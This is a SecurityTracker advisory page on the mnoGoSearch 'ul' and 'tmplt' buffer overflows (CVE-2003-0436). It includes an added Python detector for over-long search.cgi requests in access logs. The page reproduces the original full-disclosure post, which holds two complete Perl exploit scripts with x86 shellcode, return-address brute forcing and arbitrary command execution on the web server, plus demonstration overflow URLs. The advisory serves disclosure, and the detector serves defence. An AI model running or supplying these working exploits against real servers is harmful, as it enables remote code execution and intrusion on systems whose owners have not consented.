SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   mnoGoSearch Vendors:   Lavtech.Com Corp.
mnoGoSearch Buffer Overflows in 'ul' and 'tmplt' Variables Permit Remote Code Execution
SecurityTracker Alert ID:  1006963
SecurityTracker URL:  http://securitytracker.com/id/1006963
CVE Reference:   CVE-2003-0436   (Links to External Site)
Updated:  Jul 28 2003
Original Entry Date:  Jun 10 2003
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 3.1.20, 3.2.10
Description:   Two buffer overflow vulnerabilities were reported in mnoGoSearch. A remote user can execute arbitrary code.

SCAN Associates reported that a remote user can submit a URL with a specially crafted 'ul' variable of more than 5000 characters to trigger a buffer overflow and execute arbitrary code. The code will run with the privileges of the web server process. Version 3.1.20 is affected by this overflow.

A demonstration exploit URL is provided:

http://[target]/cgi-bin/search.cgi?ul=[6000]A`s

A demonstration exploit script (mencari_sebuah_nama.pl) is provided in the Source Message.

It is also reported that a remote user can supply a specially crafted 'tmplt' variable that is longer than 1024 characters to trigger a buffer overflow in version 3.2.10. Arbitrary code can be executed, according to the report. The code will run with the privileges of the web server process.

A demonstration exploit URL is provided:

http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050]A`s

A demonstration exploit script (mencari_asal_usul.pl) is provided in the Source Message.
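As an added defensive example (not part of this advisory or of the mnoGoSearch project), the following check scans web server access-log lines for search.cgi requests whose 'ul' or 'tmplt' parameter exceeds the lengths the report gives; the log lines and addresses are constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Thresholds taken from the advisory: 'ul' overflows beyond 5000 bytes
# (3.1.20) and 'tmplt' overflows beyond 1024 bytes (3.2.10).
PARAM_LIMITS = {"ul": 5000, "tmplt": 1024}

# Common Log Format: client ident user [time] "METHOD TARGET VERSION" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def check_request_target(target):
    """Return (param, length, limit) tuples for over-long search.cgi params."""
    parts = urlsplit(target)
    if not parts.path.endswith("/search.cgi"):
        return []
    findings = []
    # parse_qs percent-decodes values, so lengths reflect what the CGI sees
    qs = parse_qs(parts.query, keep_blank_values=True)
    for name, limit in PARAM_LIMITS.items():
        for value in qs.get(name, []):
            if len(value) > limit:
                findings.append((name, len(value), limit))
    return findings

def scan_log(lines):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        src, method, target, status = m.groups()
        for param, length, limit in check_request_target(target):
            hits.append({"src": src, "param": param, "length": length,
                         "limit": limit, "status": int(status)})
    return hits

# Constructed sample log lines (not from the advisory); the long values
# mirror the [6000]A`s and [1050]A`s shapes described in the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2003:12:00:01 +0000] "GET /cgi-bin/search.cgi?q=linux&ul=http://example.test/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Jun/2003:12:00:02 +0000] "GET /cgi-bin/search.cgi?ul=' + 'A' * 6000 + ' HTTP/1.1" 500 0',
    '10.0.0.9 - - [10/Jun/2003:12:00:03 +0000] "GET /cgi-bin/search.cgi?tmplt=' + 'A' * 1050 + ' HTTP/1.1" 500 0',
    '10.0.0.7 - - [10/Jun/2003:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 500 status on such a request is consistent with search.cgi crashing, but the length check alone is the indicator worth alerting on.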

The vendor was reportedly notified on June 1, 2003.

Impact:   A remote user can execute arbitrary code on the target server with the privileges of the web server process.
Solution:   A fixed version is available via CVS at:

http://www.mnogosearch.org/download.html

Vendor URL:  www.mnogosearch.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 28 2003 (Conectiva Issues Fix) mnoGoSearch Buffer Overflows in 'ul' and 'tmplt' Variables Permit Remote Code Execution
Conectiva has released a fix.



 Source Message Contents

Subject:  [Full-Disclosure] mnogosearch 3.1.20 and 3.2.10 buffer overflow



Products: mnogosearch 3.1.20 and 3.2.10 (http://www.mnogosearch.org)
Date: 06 June 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:	sk_at_scan-associates.net
		shaharil_at_scan-associates.net
		munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: mnogosearch 3.1.20 and 3.2.10 buffer overflow

Description
===========
*mnoGoSearch* (formerly known as *UdmSearch*) is a full-featured web
search engine software for intranet and internet servers.

Details
=======
There are buffer overflow vulnerabilities in mnogosearch 3.1.20 and 3.2.10.

1) Buffer overflow in "ul" variable in 3.1.20

The "ul" variable is used to restrict search results to a specific URL. By supplying
a crafted "ul" variable of more than 5000 characters, a user can overwrite an arbitrary address and
run commands as the web server user.

ex:
    http://blablabla.com/cgi-bin/search.cgi?ul=[6000]A`s

proof of concept
----------------
[see attachment: mencari_sebuah_nama.pl]

2) Buffer overflow in "tmplt" variable in 3.2.10
A user can crash search.cgi by supplying a "tmplt" variable of over 1024 characters.
This is a stack-based buffer overflow in which eip can easily be overwritten.

ex:
     http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050]A`s

proof of concept
----------------
[see attachment: mencari_asal_usul.pl]

Vendor Response
===============
The vendor was contacted on 01/06/2003 and a fix is available from CVS at
http://www.mnogosearch.org.

Attachment: mencari_sebuah_nama.pl

#!/usr/bin/perl
# 
# [ reloaded ] 
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet: 
#	tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, 
#	kerengge_kurus, b0iler and d'scan clanz.
#
# Shout to:
#	#mybsd, #mylinux, #vuln
#
# Special thanks:
#	Skywizard of mybsd
#   
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1): 
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#
#

use IO::Socket;

$host = "127.0.0.1";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;


if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of d' scan clanz\n\n";
	print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) + (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
	 	
}

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;
}

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));
    		
	}	
	
}

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";
	}	
}

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
	             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	             ."\x41\x41"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	&connect_to;
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
	}
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	&exploit($rawret);
	&check_result;
	if ($success == 1){
		exit;
	}
	sleep 1;
}

# generate shellcode



Attachment: mencari_asal_usul.pl

#!/usr/bin/perl
#
# mnogosearch 3.2.x exploit for linux ix86
# by pokleyzz and s0cket370 of d'scan clanz
# 
# Greet: 
#	tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan.
#
# Special thanks:
#	Skywizard of mybsd
#
# 
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#

use IO::Socket;

my $host = "127.0.0.1";
my $port = 80;
my $searchpath = "/cgi-bin/search.cgi";
my $envsize = 4096;
my $suffsize = 3;
my $rawret = "bfffd666";
my $ret;
my $cmd = "ls -l";
my $conn;

if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.2.x exploit for linux ix86 \n\tby pokleyzz and s0cket370 of d' scan clan\n\n";
	print "Usage: \n mencari_asal_usul.pl hostname [command ] [path] [port] [suff] [ret]\n";
	print "\t- if not success try to use 0,1 or 2 for suff (default is 3)";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = $ARGV[5];	
}

# linux ix86 shellcode rip from phx.c by proton
my $shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             ."\x41\x41"
             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
             ."$cmd"
             ."@";

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 6, 2)));
		$ret .= chr(hex(substr($rawret, 4, 2)));
		$ret .= chr(hex(substr($rawret, 2, 2)));
    		$ret .= chr(hex(substr($rawret, 0, 2)));
    		
	}	
	
}

sub connect_to {
	print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /\/test\//){
		print "[x] Correct version.. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] Old version or wrong url\n";
	}	
}

# start exploiting ...
sub exploit {

	# generate environment variable for http request
	$envvar = 'A' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query request
	$query = 'A' x $suffsize;
	$query .= $ret x 258;
	
	# generate request
	$request = "GET $searchpath?tmplt=$query HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	print "[x] Trying to execute command ... \n";
	print "[x] Return address : $rawret \n";
	print "[x] Suffix size : $suffsize \n";
	connect_to();
	print $conn "$request"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
	if ($result =~ /hello/){
		print $result;
	} else {
		print "[*] Failed ...\n";
	}
}



&string_to_ret($rawret);
&check_version;
&exploit;	


